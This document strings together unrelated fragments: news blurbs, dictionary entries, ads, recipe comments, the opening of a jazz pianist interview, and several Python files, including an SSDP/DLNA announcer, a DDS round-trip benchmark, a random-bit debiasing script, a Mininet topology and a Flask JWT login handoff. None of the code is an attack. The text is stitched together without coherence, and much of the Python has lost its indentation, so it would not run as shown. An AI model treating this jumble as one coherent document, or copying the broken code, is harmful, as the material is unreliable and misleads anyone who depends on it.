html = render_template("email/export.html", **params)
log.info("Notification: %s", plain)
subject = "Export ready for download"
email_role(export.creator, subject, html=html, plain=plain)
|
A representative of the Hagerstown police union says the department is desperate for more officers.
Police say a dispute led to two people being shot in the parking lot of a northwest side Autozone.
Theodore Kernan, 46, of Bridgewater allegedly broke into four stores, a Dunkin' Donuts where he crawled through the drive-thru window, police said.
Verb. The company supplied the necessary money. You'll have to supply your own food. Noun. adequate supplies of fresh water He bought a month's supply of cigarettes. They took a month's worth of supplies on the camping trip. The town is in need of basic medical supplies. a store that sells art supplies The state is trying to disrupt the supply of illegal drugs.
a. producer phase--That phase of military supply that extends from determination of procurement schedules to acceptance of finished supplies by the Military Services. b. consumer phase--That phase of military supply which extends from receipt of finished supplies by the Military Services through issue for use or consumption.
The brindled cow, which has led us hither, will supply us with milk. Remember the interpositions of God to supply the necessities of the destitute. "We must do our best to supply the deficiency," said Morton, as he entered. The 'interviewer' may make use of it to supply him with 'copy,' but this remains to be seen.
Supply is an Auckland based creative design company specialising in identity and brand design, packaging design, print design, publication design and website design.
supply definition: 1. to provide something that is wanted or needed, often in large quantities and over a long period of time: 2. an amount of something that is available for use: 3. food or other things necessary for living: . Learn more.
Supply is a brand born out of dissatisfaction with the everyday essentials available to us. Starting with our single blade razors, we made it our mission to develop products purposefully with an obsessive dedication to quality, durability, & functionality. |
from unittest import TestCase
import re
from eizzek.lib.decorators import plugin, session_plugin
from eizzek.lib.registry import registry, session_registry
class PluginTest(TestCase):
def setUp(self):
registry.clear()
def test_plugin(self):
assert len(registry.plugins) == 0
@plugin(r'^ping (.+)$')
def ping(**kwargs):
return ''
assert len(registry.plugins) == 1
        assert 'ping' in registry.plugins
def test_named_plugin(self):
assert len(registry.plugins) == 0
@plugin(r'^ping (.+)$', name='ping_plugin')
def ping(**kwargs):
return ''
assert len(registry.plugins) == 1
        assert 'ping_plugin' in registry.plugins
class SessionPluginTest(TestCase):
def setUp(self):
session_registry.clear()
def test_create_session_plugin(self):
assert 0 == len(session_registry.plugins)
@session_plugin
class Translate(object):
name = 'translate'
regex = r'^translate (?P<something>\w+)$'
assert 1 == len(session_registry.plugins)
        assert 'translate' in session_registry.plugins
|
Just imagine the luxury of coming home after a long day at work amid the Metro Manila traffic. Upon contact, you slowly give in to your bed’s playful call to slumber. Your eyes grow heavy as you drag your tired body, anticipating the warm caress of your duvet cover wrapping you up in its cocoon of comfort. Slowly, the thoughts of the exhausting work day drift off while you climb the peak of relaxation. Hours pass as if they were seconds and you wake up the next day feeling refreshed, ready to start the day but not really keen on leaving the comfort of your bed. You sit up, smile and think of how the time you spent shopping for bedding was all worth it.
coziness of a blanket. The right combination makes for the most comfortable slumber.
So what brand defines the perfect sheet set?
products have been carefully selected to provide the perfect experience of going above and even beyond a superb lifestyle.
consumers. Only the finest products have been carefully selected to give your home a touch of unique sophistication and class. The new collection includes vigorous and youthful designs as well as brand new colors for its Lifestyle Urban Premium, Urban Basic, and Pick n’ Go collections, all designed to guarantee the highest quality of comfort.
In the previous year, Canadian Manufacturing’s products underwent a fabric upgrade, starting with the Lifestyle Urban Premium line, which went from a 220-thread count to a 300-thread count 100% cotton. The Urban Basic Collection also upgraded to a 180-thread count cotton-rich blend from its previous 150-thread count, and the Lifestyle Pick n’ Go collection continues to provide budget-conscious consumers a wide variety of playful and lively bed sheet designs and comfort. With a wide range of prints and hues to choose from, Modern Linen, another brand extension of Lifestyle, can suit the needs of every budget-conscious consumer. Modern Linen offers a collection of microfiber plain sheet sets as well as printed designs. Another collection to look forward to this year is Canadian’s wide assortment of white fabrics.
Canadian Bed & Bath started to cater to the hospitality industry back in 2003 and slowly expanded its products and services to serve not only hotels and resorts, but hospitals, spas and restaurants as well. To this day, their series of white sheets, towels, pillows, table linens and bed accessories remains world-class quality. Lifestyle Bed Linens also brings you only the finest towels for everyday use. In its campaign to promote only the highest quality products, Lifestyle Towels aims to provide the market with excellent, pure cotton products while remaining environmentally responsible. In doing so, CCI acquired cotton from all over the world to offer something to suit every taste. Highlighting this year’s collection are Brazilian Cotton, USA Cotton and Cotton Made in Africa.
Brazilian cotton ensures a unique drying experience with its soft, contamination free, super-absorbent material crafted with a unique beveled design.
USA Cotton has been proclaimed one of the best cottons in the world, grown with the highest quality standards to provide a clean, contamination free towel. Organic 100% combed cotton is grown in strictly controlled environments to produce the purest natural cotton.
Lifestyle by Canadian is available at major department stores nationwide. For more details and collections, visit their website www.canadianbeddings.com.
For promotions and updates, like their Facebook page “Lifestyle Bed Linens”. |
#!/usr/bin/python
# Copyright (C) 2014 Graham R. Cobb
# Released under GPL V2 -- see LICENSE
# Python multicast code taken from Stack Overflow (https://stackoverflow.com/questions/603852/multicast-in-python/1794373#1794373) by tolomea (https://stackoverflow.com/users/10471/tolomea) under CC BY-SA 3.0
# Other example code taken from Stack Overflow by Toddeman (under CC BY-SA 3.0), however it does not seem to be available any longer
import socket
import struct
import time
import select
import re
from optparse import OptionParser
VERSION='0.3'
DLNA_GRP = '239.255.255.250'
DLNA_PORT = 1900
MCAST_IF = '127.0.0.1'
CRLF = "\015\012"
#SERVER='192.168.0.238'
SERVER=''
UUID=''
URL=''
INTERVAL = 180
parser = OptionParser(usage="usage: %prog [options] server\n %prog --listen-only",
epilog="Server can be specified as hostname or IP address and should be omitted if --listen-only is used",
version="%prog "+VERSION)
parser.add_option("-a", "--all",
action="store_true", dest="allif", default=False,
help="send announcements to all interfaces, not just the loopback interface")
parser.add_option("-i", "--interval", type="int", dest="interval", default=INTERVAL,
help="seconds between notification updates (default %default)")
parser.add_option("-l", "--listen-only",
action="store_true", dest="listen", default=False,
help="just listen and display messages seen, do not contact a server or send announcements")
(options, args) = parser.parse_args()
LISTEN=options.listen
if len(args) == 0 and not LISTEN:
parser.error("server must be specified (hostname or IP address)")
if len(args) > 1:
parser.error("incorrect number of arguments")
if not LISTEN:
SERVER=args[0]
INTERVAL=options.interval
osock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
osock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
osock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 4)
osock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_LOOP, 1)
if not options.allif:
mreq = struct.pack("4sl", socket.inet_aton(MCAST_IF), socket.INADDR_ANY)
osock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, mreq)
imsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
imsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
imsock.bind(('', DLNA_PORT))
mreq = struct.pack("4sl", socket.inet_aton(DLNA_GRP), socket.INADDR_ANY)
imsock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
# The device/service types advertised. None stands for the bare device UUID,
# whose USN has no "::<type>" suffix.
SSDP_TYPES = [
    'urn:schemas-upnp-org:device:MediaServer:1',
    'upnp:rootdevice',
    None,
    'urn:schemas-upnp-org:service:ContentDirectory:1',
    'urn:schemas-upnp-org:service:ConnectionManager:1',
    'urn:schemas-upnp-org:service:X_MS_MediaReceiverRegistrar:1',
]
def send_messages(addr, port, start_line, type_header):
    # Send one SSDP message per advertised type.
    # Note: responses should have ST:, notifies should have NT:
    for ssdp_type in SSDP_TYPES:
        if ssdp_type is None:
            nt = 'uuid:' + UUID
            usn = nt
        else:
            nt = ssdp_type
            usn = 'uuid:' + UUID + '::' + ssdp_type
        msg = start_line + CRLF \
            + type_header + ': ' + nt + CRLF \
            + 'USN: ' + usn + CRLF \
            + 'NTS: ssdp:alive' + CRLF \
            + 'LOCATION: ' + URL + CRLF \
            + 'HOST: 239.255.255.250:1900' + CRLF \
            + 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
            + 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
            + CRLF
        print "Sending ("+addr+":"+str(port)+"): \n" + msg
        osock.sendto(msg, (addr, port))
def notify(addr, port):
    if (URL != '' and UUID != '' and not LISTEN):
        send_messages(addr, port, 'NOTIFY * HTTP/1.1', 'NT')
    else:
        print "Skipping notification"
def respond(addr, port):
    if (URL != '' and UUID != '' and not LISTEN):
        send_messages(addr, port, 'HTTP/1.1 200 OK', 'ST')
    else:
        print "Skipping response"
def server():
if not LISTEN:
msg = ('M-SEARCH * HTTP/1.1' + CRLF \
+ 'Host: %s:%d' + CRLF \
+ 'Man: "ssdp:discover"' + CRLF \
+ 'ST: upnp:rootdevice' + CRLF \
+ 'MX: 3' + CRLF \
+ 'User-Agent:ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ CRLF) % (SERVER, DLNA_PORT)
print "Sending to server: \n" + msg
osock.sendto(msg, (SERVER, DLNA_PORT))
def parse_msg(msg):
global URL, UUID, last_update, next_notification
if (re.match('^HTTP/1.1\s*200\s*OK', msg, re.IGNORECASE)):
# Response to our M-SEARCH
match = re.search(r'^LOCATION:\s*(.*)\r$', msg, re.IGNORECASE | re.MULTILINE)
if match:
URL = match.group(1)
match = re.search(r'^USN:\s*uuid:([^:]+):', msg, re.IGNORECASE | re.MULTILINE)
if match:
UUID = match.group(1)
print 'URL=%s, UUID=%s.' % (URL, UUID)
last_update = time.time()
        # Bring the notification forward
next_notification = time.time() + 1
def is_search(msg):
return re.match('^M-SEARCH', msg, re.IGNORECASE)
# Get info from server
last_update = 0
server()
next_notification = time.time() + INTERVAL
# Note: the port is not set up until at least one send has happened
(notused, oport) = osock.getsockname()
isock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
isock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
isock.bind(('', oport))
while True:
(readyin, notused, notused) = select.select([isock, imsock], [], [], max(next_notification - time.time(),0))
if (isock in readyin):
(msg, (addr, port)) = isock.recvfrom(4096)
print "Received unicast from %s:%d\n%s" % (addr, port, msg)
if (is_search(msg)):
respond(addr, port)
else:
parse_msg(msg)
if (imsock in readyin):
(msg, (addr, port)) = imsock.recvfrom(4096)
if (port == oport):
print "Ignored multicast from ourselves (%s:%d)" % (addr, port)
else:
print "Received multicast from %s:%d\n%s" % (addr, port, msg)
if (is_search(msg)):
respond(addr, port)
if (time.time() >= next_notification):
next_notification = time.time() + INTERVAL
# Has the server info been updated recently?
if (time.time() - last_update <= INTERVAL):
# Yes, just do the notification
notify(DLNA_GRP, DLNA_PORT)
else:
# Get new info from the server
server()
|
Here is my simple tomato sauce recipe; it works perfectly with pasta dishes, or when thickened it can be used as a pizza sauce.
Blend the tomatoes, capsicum, chilli, onion and carrot with a bit of water until smooth. Heat the oil in a pan, then add the garlic paste, followed by the tomato paste.
Once that's cooked for a couple of minutes, add the blended mixture and simmer. Add salt and sugar followed by a bit of tandoori masala or cumin powder or oregano or you can just leave it plain and unspiced according to your taste.
Let it simmer until thick and all the water is gone. Taste and adjust if needed. Then use accordingly!
aslm fauzia, how long can I keep this sauce in the fridge?
W/Salaam, the sauce keeps well for about 4 days in the fridge but up to a month if frozen.
i would like to ask one thing ... after adding the garlic paste into the pan we directly add the blender mixture or something else first added into it.
W/Salaam, as mentioned in the recipe...first oil goes in the pan, then garlic, then tomato paste and THEN the blended mixture.
Made ur baked naan ,it was gorgeous ,love it ,thank u for the recipe .in myanmar we don't get naan ,my all family members conveying u regards .
Assalam-0-Allaikum Fauzia...approximately how many pizzas we can make with this quantity (12 inches pizzas)???
ur recepies r really excellent i try many of them really yumyyyyyyyyyyyyyyyyyy.i want to ask pizza baking in microwave oven take how much time?
Hi! Thanks, although I never bake or cook anything in my microwave so cannot know how long it would take to bake in that.
I am from Maldives. I have tried some of your dishes and all my family members really like the tastes of it. Its really yummy. Our best regards and well wishes from all of us.
Is it ok if I omit capsicum in the sauce & the chicken filling, as it is not easily available at my place?
how to make tomato paste ??
WAAAOW. Very easy, I vl try it when I want to bake pizza. Madam g, u r great.
I m 4m Muzaffarabad. Azad Kashmir.
hi ur recipes r really good i like them & tried toooooooooooo,plz add pakistani simple dishes tooooo.
Salam. Used this recipe for pasta twice. Tastes really good. People usually can't believe it blended in it carrots and capsicum. Hehe. Ingenius in deed! JazakumAllah Khayr Sister Fauzia!
Can i make tomato paste by blending a peeled tomato?
Blend and then cook it down until it is very thick and concentrated. Then that will be tomato paste.
make n add tomato pure with that same process??
Tomato puree/paste is different and more concentrated than just blending tomatoes. It helps thicken and enrich the mixture. |
import utils, os, sys, csv, subprocess, time, optparse, pdb
def pingpong(o):
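    # Build the list of [ping, pong, API-label] executables to benchmark, then
    # for each API run ping/pong over payloads doubling from 1KB up to
    # o.maxpayload KB, writing per-API CSV results and an overall averages CSV.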
texec = []
ping = 'ping'
pong = 'pong'
if sys.platform == 'win32':
ping = 'ping.exe'
pong = 'pong.exe'
apiselect=0
if o.capi:
#C
texec.append([])
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/c/' + ping)
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/c/' + pong)
texec[apiselect].append('C')
apiselect+=1
if o.cppapi:
#SACPP
texec.append([])
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/cpp/' + ping)
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/cpp/' + pong)
texec[apiselect].append('SACPP')
apiselect+=1
if o.isoapi:
#ISOCPP
texec.append([])
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/isocpp/' + ping)
texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/isocpp/' + pong)
texec[apiselect].append('ISOCPP')
apiselect+=1
''' Create or append to total averages file '''
tafcsv = utils.getCSV(o.averagesfile)
#Create nested dictionary
results = utils.tree()
for i in texec:
resultsApi = results[i[2]]
#1KB
Bsize = 1000
try:
if o.pongonly:
pong = subprocess.Popen([i[1]],stdout=subprocess.PIPE, stderr=subprocess.PIPE)
utils.setPriority(pong.pid, o.pongnice, o.pongaffinity)
if o.pongonly and not o.pingonly:
#Run for 10 minutes and exit program
time.sleep(600)
sys.exit(0)
time.sleep(1)
''' Set the CSV output file (af) '''
csvfile = i[0] + ".csv"
cw = utils.getCSV(csvfile)
cw.writerow([str(time.strftime("%x %H:%M:%S"))])
try:
while(Bsize <= (o.maxpayload * 1000)):
resultsBsize = resultsApi[int(Bsize)]
print "launching " + i[0] + "with args:" + str(Bsize) + " " + str(o.samples) + " " + str(o.seconds)
cw.writerow([str(Bsize/1000)+"KB"])
                    cw.writerow(['Seconds'] + ['RT Count'] + ['RT median'] + ['RT min'] +
                                ['R Count'] + ['R median'] + ['R min'] +
                                ['W Count'] + ['W median'] + ['W min'])
try:
if o.pingonly:
ping = subprocess.Popen( [i[0], str(Bsize), str(o.samples), str(o.seconds) ],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
utils.setPriority(ping.pid, o.pingnice, o.pingaffinity)
except OSError:
print "Cannot find ping executable: " + str([i[0]])
#Wait for ping to terminate
ping.wait()
for line in ping.stderr:
print 'err: ' + line
for line in ping.stdout:
utils.parseRT(line,resultsBsize)
for key in sorted(resultsBsize):
k = resultsBsize[key]
cw.writerow([key] +
[k['RoundTrip']['Count']] + [k['RoundTrip']['Median']] + [k['RoundTrip']['Min']] +
[k['Read']['Count']] + [k['Read']['Median']] + [k['Read']['Min']] +
[k['Write']['Count']] + [k['Write']['Median']] + [k['Write']['Min']])
Bsize = Bsize*2
except OSError:
print "Cannot find ping executable: " + [i[0]]
finally:
if o.pongonly:
#Quit pong
pingq = subprocess.Popen( [i[0], 'quit' ], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
pingq.wait()
for line in zip(pingq.stdout, pingq.stderr):
print line
pong.terminate()
except OSError:
print "Cannot find pong executable: " + str([i[1]])
tafcsv.writerow([str(time.strftime("%x %H:%M:%S"))])
    tafcsv.writerow(['Payload KB'] + ['RoundTrip C'] + ['RoundTrip SACPP'] + ['RoundTrip ISOCPP']
                    + ['Read C'] + ['Read SACPP'] + ['Read ISOCPP']
                    + ['Write C'] + ['Write SACPP'] + ['Write ISOCPP'])
Bsize = 1000
while Bsize <= (o.maxpayload * 1000):
KB = Bsize/1000
#pdb.set_trace()
tafcsv.writerow([KB] + utils.is_empty(results['C'][Bsize]['Overall']['RoundTrip']['Median'])
+ utils.is_empty(results['SACPP'][Bsize]['Overall']['RoundTrip']['Median'])
+ utils.is_empty(results['ISOCPP'][Bsize]['Overall']['RoundTrip']['Median'])
+ utils.is_empty(results['C'][Bsize]['Overall']['Read']['Median'])
+ utils.is_empty(results['SACPP'][Bsize]['Overall']['Read']['Median'])
+ utils.is_empty(results['ISOCPP'][Bsize]['Overall']['Read']['Median'])
+ utils.is_empty(results['C'][Bsize]['Overall']['Write']['Median'])
+ utils.is_empty(results['SACPP'][Bsize]['Overall']['Write']['Median'])
+ utils.is_empty(results['ISOCPP'][Bsize]['Overall']['Write']['Median']))
Bsize = Bsize*2
def main():
parser = optparse.OptionParser()
parser.add_option("-C", "--capi", dest="capi",
help="Run C API Roundtrip",
action="store_true",
default=False)
parser.add_option("-S", "--sacppapi", dest="cppapi",
help="Run SACPP API Roundtrip",
action="store_true",
default=False)
parser.add_option("-I", "--isocppapi", dest="isoapi",
help="Run ISOCPP API Roundtrip",
action="store_true",
default=False)
parser.add_option("-o", "--output", dest="averagesfile",
help=("Optional path and filename for a overall average payload and API size by"
"default this is stored in the current working directory"),
default="averages.csv")
parser.add_option("", "--pingonly", dest="pingonly",
help="Only create the ping daemon",
action="store_true",
default=False)
parser.add_option("", "--pongonly", dest="pongonly",
help="Only create the pong daemon",
action="store_true",
default=False)
pingopt = optparse.OptionGroup(parser, "Ping options",
"Change arguments for ping, run time in seconds, number of samples and maxpayload")
pingopt.add_option("", "--seconds", type="int", dest="seconds",
help="The number of seconds ping should execute for, the default is 10",
default=10)
pingopt.add_option("", "--samples", type="int", dest="samples",
help="The number of samples ping should send, the default is infinite",
default=0)
pingopt.add_option("", "--maxpayload", type="int", dest="maxpayload",
help="The max payload in kB, the default is 64",
default=64)
parser.add_option_group(pingopt)
cpuopt = optparse.OptionGroup(parser, "CPU and priority options",
"Allow the setting of NICE and CPU affinity")
cpuopt.add_option("", "--pingaffinity", type="int", dest="pingaffinity",
help="Set the CPU affinity for the ping process, the default is cpu 1",
default=1)
cpuopt.add_option("", "--pongaffinity", type="int", dest="pongaffinity",
help="Set the CPU affinity for the pong process, the default is cpu 0",
default=0)
cpuopt.add_option("", "--pingnice", type="int", dest="pingnice",
help="Set the nice value for the ping process, the default is -20. NOTE: This option is available on Linux only, Windows will run under REALTIME_PRIORITY_CLASS",
default=-20)
cpuopt.add_option("", "--pongnice", type="int", dest="pongnice",
help="Set the nice value for the pong process, the default is -20. NOTE: This option is available on Linux only, Windows will run under REALTIME_PRIORITY_CLASS",
default=-20)
parser.add_option_group(cpuopt)
(options, args) = parser.parse_args()
if(not options.capi and not options.cppapi and not options.isoapi):
#Nothing was set, run them all
options.capi = True
options.cppapi = True
options.isoapi = True
if not options.pingonly and not options.pongonly:
#Ping and pong (default)
options.pingonly = True
options.pongonly = True
pingpong(options)
if __name__ == "__main__":
main()
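# Example invocation (illustrative; the script file name is hypothetical,
# not part of the original source):
#   python roundtrip.py --capi --seconds 30 --maxpayload 128 -o results.csv
# This runs only the C API roundtrip for 30 seconds per payload size, doubling
# the payload from 1 kB up to 128 kB, and writes the per-size medians to
# results.csv. With no API flags given, all three APIs (C, SACPP, ISOCPP) run.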
|
BML International-UK was founded in 1994 with a simple aim: to represent its clients and to find the best match for their varied M.I.C.E. needs.
Our service is global and we can source your next destination, venue and hotel based on your specific budget and criteria.
Whether you wish to organise an incentive programme, a product launch, a sales and marketing meeting, a conference, a convention or an exhibition, we are here to help you.
Recommend the best venue, while considering: cost, services required, suitability of conference/meeting rooms, type of accommodation required and other related facilities needed.
Arrange inspection visits for clients or we will attend on your behalf.
Build a close relationship with you, our client, to ensure a successful and smooth running event.
Research and organise pre and post event activities/tours, etc.
Above all, BML International-UK offers services enabling you to make the right decision for your important event. |
#! ../environment/bin/python3.3
import argparse
import tempfile
def main():
parser = argparse.ArgumentParser(description = 'Reads binary data from a file')
parser.add_argument('-f', '--file',
type = str,
default = '/dev/dsp',
help = 'Specifies file to read.',
dest = 'datasource')
parser.add_argument('-b', '--bytesize',
type = int,
default = None,
help = 'Specifies number of bytes to read.',
dest = 'bytesize')
parser.add_argument('-d', '--debias',
default = False,
const = True,
action = 'store_const',
help = 'Uses Von Neumann algorithm to balance numbers of 1s and 0s',
dest = 'debias')
parser.add_argument('-t', '--temp',
default = '/tmp',
help = 'Give a prefix destination for storing temporary files',
dest = 'temp')
opts = parser.parse_args()
BitSource = DataStream(opts.datasource)
print(BitSource.getBinary(opts.bytesize, opts.debias, opts.temp))
def VNdebias(binary, temp):
debfile = tempfile.TemporaryFile(mode='a+', prefix = temp)
while True:
bits = binary.read(2)
try:
if bits[0] != bits[1]:
debfile.write(bits[1])
except IndexError:
break
debfile.seek(0)
return debfile.read()
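# A quick illustration of the Von Neumann extractor above (added example, not
# part of the original script): pairs whose two bits differ emit the second
# bit, identical pairs are discarded, so the biased stream shrinks but the
# surviving bits are balanced.
#   >>> import io
#   >>> VNdebias(io.StringIO('0110001101'), 'vndemo')
#   '101'   # '01' -> '1', '10' -> '0', '00' and '11' dropped, '01' -> '1'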
class DataStream:
def __init__(self, datasource):
self.datasource = datasource
def getBytes(self, bytesize):
with open(self.datasource,'rb') as bitSource:
return bitSource.read(bytesize)
def getInts(self, bytesize):
sourcebytes = self.getBytes(bytesize)
return sourcebytes
def getBinary(self, bytesize, debias, temp):
binfile = tempfile.TemporaryFile(mode='w+', prefix=temp)
for bit in self.getInts(bytesize):
binfile.write(format(bit,'08b'))
binfile.seek(0)
if not debias:
return binfile.read()
else:
return VNdebias(binfile, temp)
if __name__ == "__main__":
main()
|
Description : Designed to complement our new Super LoLux HD range of security cameras, the GD-W192 is an 18.5-inch widescreen, WXGA resolution (1366 x 768 pixel) LCD monitor perfect for 24/7 operation. Combining the best new technologies, such as LED backlighting, with improved performance, reduced energy use and JVC's great build quality, the GD-W192 is the ideal choice for any modern security situation.
GD-W192: 1366 x 768 pixel WXGA resolution, anti-glare screen.
3D Comb Filter helps to reduce composite video processing artifacts.
LED Backlight enables mercury-free, low power consumption operation. |
#!/usr/bin/python
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
# Topology with two switches and two hosts (static macs, no loops, no STP)
#
# 172.16.10.0/24
# h1 ------------------- sw1 ------------------ sw2 ------------------- h2
# .1 .2
##############################################################################
from mininet.net import Mininet, VERSION
from mininet.log import setLogLevel, info
from mininet.cli import CLI
from distutils.version import StrictVersion
from p4_mininet import P4DockerSwitch
def main():
net = Mininet( controller = None )
# add hosts
h1 = net.addHost( 'h1', ip = '172.16.10.1/24' )
h2 = net.addHost( 'h2', ip = '172.16.10.2/24' )
# add switch 1
sw1 = net.addSwitch( 'sw1', target_name = "p4dockerswitch",
cls = P4DockerSwitch, config_fs = 'configs/sw1/l2',
pcap_dump = True )
# add switch 2
sw2 = net.addSwitch( 'sw2', target_name = "p4dockerswitch",
cls = P4DockerSwitch, config_fs = 'configs/sw2/l2',
pcap_dump = True )
# add links
if StrictVersion(VERSION) <= StrictVersion('2.2.0') :
net.addLink( sw1, h1, port1 = 1 )
net.addLink( sw1, sw2, port1 = 2, port2 = 2 )
net.addLink( sw2, h2, port1 = 1 )
else:
net.addLink( sw1, h1, port1 = 1, fast=False )
net.addLink( sw1, sw2, port1 = 2, port2 = 2, fast=False )
net.addLink( sw2, h2, port1 = 1, fast=False )
net.start()
CLI( net )
net.stop()
if __name__ == '__main__':
setLogLevel( 'info' )
main()
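# Once the Mininet CLI prompt appears, connectivity across the two switches can
# be checked interactively (illustrative session, not part of the original script):
#   mininet> h1 ping -c 3 172.16.10.2
#   mininet> pingall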
|
SAN DIEGO – Six years after purchasing the aging Mission Valley Resort on Hotel Circle South, demolition of the former resort is complete, and the Morris Cerullo Legacy International Center is moving from the past into its future.
Designed by the renowned San Diego architect Gordon Carrier and his Carrier Johnson team, and being constructed by Clark Construction (builder of Petco Park and the Naval Hospital at Camp Pendleton), grading has already begun at the site. Retaining walls are under construction and underground sewer and storm drain lines are being installed. Due to open in November 2019, the Legacy Center will bring a world-class resort hotel and a cutting-edge, technologically advanced visitor experience to San Diego.
This “Destination with a Destiny” resort is expected to attract visitors from across the region, the United States, and from around the world, where Dr. Morris Cerullo, the center’s patron, has spent his life ministering face to face to over 5 million people.
The Welcome Center will feature a 30-foot diameter interactive globe of the world, offering information on cities, countries, and cultures through dozens of touch screen panels. Rock-wall-lined Roman catacombs will transport the visitor back 2,000 years to ancient cultures.
The centerpiece of the Welcome Center is the 100-seat, full-motion-seat History Dome Theater, which will feature films produced by Disney alumni at Visioneering. In “Wings over Israel” visitors will soar above the treetops, coastline, and historic sites of Israel, from the Sea of Galilee and Masada to the Jordan River and Jerusalem, in a breathtaking experience.
Also featured is “Walk through the Bible,” a thrilling 4-dimensional journey through the Bible from Genesis to Jesus Christ. The theatre is equipped with motion seats, wind, fog, light strobes, and scents, to fully immerse the visitor in a complete experience.
The 127-room, luxurious Legacy Resort Hotel, replete with a world-class restaurant, “Theresa’s,” a spa, and full fitness facilities, will be open to the public. “The Patio” restaurant will provide a more casual dining experience, and catering services that will allow visiting groups and the community to hold receptions and special events.
The project also has a replica of Jerusalem’s Western Wall that stands 16 feet high and 110 feet long. The wall is to be made out of stone imported from Jerusalem.
An indoor-outdoor marketplace, selling goods from around the world, will be located near the Wailing Wall replica, where visitors can feel as if they are shopping in another part of the world.
The Pavilion will feature a 500-seat theatre, capable of live-stage productions and first-run film showings, along with a learning and conference center.
“The Legacy International Center is being created for you. No matter what your background, culture, or beliefs, Legacy will bring you a one-of-a-kind experience that you will never forget,” says Dr. Morris Cerullo.
Dr. Cerullo, affectionately known as “Papa” to millions across the globe who have been touched by his decades of personal ministry, is known for his outreaches to the people in 400 cities, in 93 nations, on 7 continents over the past 70-plus years.
The Legacy International Center is an 18-acre luxury resort located in the heart of Mission Valley, in San Diego, California, and is scheduled to open in November 2019. |
import validators
import jwt
import datetime
import urllib
from flask import request, jsonify, redirect, url_for, flash
from flask_login import current_user, login_required
from pepper import settings
from pepper.utils import get_default_dashboard_for_role
# sends an access token to the callback provided by the url
@login_required
def auth():
app_id = request.args.get('app_id')
callback = request.args.get('callback')
if app_id != settings.INNOVATION_PORTAL_KEY:
return jsonify({'error': 'Invalid app_id provided'}), 422
elif callback is None or not validators.url(callback):
return jsonify({'error': 'Invalid callback provided'}), 422
elif current_user.status == 'NEW':
flash('You must finish registering before starting the puzzle challenge', 'warning')
return redirect(url_for(get_default_dashboard_for_role()))
else:
access_token = {'t': jwt.encode({'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=120),
'id': current_user.id, 'fname': current_user.fname, 'lname': current_user.lname}, settings.TOKEN_SEED, algorithm='HS256')}
return redirect(callback + "?" + urllib.urlencode(access_token))
# returns the current user's full name and database id
def get_user_info():
app_id = request.args.get('app_id')
access_token = request.args.get('t') #token
if app_id != settings.INNOVATION_PORTAL_KEY:
return jsonify({'error': 'Invalid app_id provided'}), 422
try:
decoded = jwt.decode(access_token, settings.TOKEN_SEED, algorithms=['HS256'])
return jsonify({'fname': decoded['fname'], 'lname': decoded['lname'], 'id': decoded['id']})
except jwt.ExpiredSignatureError:
return jsonify({'error': 'Token expired'}), 422
# the specific PyJWT errors must be caught before jwt.InvalidTokenError:
# InvalidSignatureError and DecodeError are its subclasses, so listing the
# generic handler first would make the specific ones unreachable
except jwt.InvalidSignatureError:
return jsonify({'error': 'Token has invalid signature'}), 422
except jwt.DecodeError:
return jsonify({'error': 'Token cannot be decoded'}), 422
except jwt.InvalidTokenError:
return jsonify({'error': 'Token validation failed'}), 422
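# Illustrative PyJWT round trip (added sketch, not part of the original module),
# showing why the handlers above are needed:
#   token = jwt.encode({'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=120),
#                       'id': 42}, 'secret', algorithm='HS256')
#   jwt.decode(token, 'secret', algorithms=['HS256'])  # -> the payload dict
# Once the 120-second window passes, the same decode call raises
# jwt.ExpiredSignatureError; a tampered token raises jwt.InvalidSignatureError
# or jwt.DecodeError.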
|
LondonJazz News: What drew you first to the piano?
Frank Harrison: My sister was taking piano lessons so we had an old Victorian upright in the house. One holiday when I was 11 we listened to a lot of Billie Holiday, and I really liked the melodies and harmonies in those tunes. So when I got home I started trying to figure them out.
LJN: Who was the teacher who left the biggest mark on you?
FH: Peter Pettinger. He was a great classical pianist but also loved jazz. He introduced me to Bill Evans (of whom he wrote a brilliant biography) and that was a big revelation. Although he knew a lot of jazz theory, he took Bill’s attitude towards tuition: that you can show someone some chords, or a melodic or rhythmic idea, but then they’re just borrowing it from you. But if you let them find it for themselves, it’s theirs. So we talked about bigger things – the sound you get from the instrument, the overall shape of a solo. He taught me to focus on those things rather than on individual notes.
LJN: Was there a sequence in the way you got to know jazz after that?
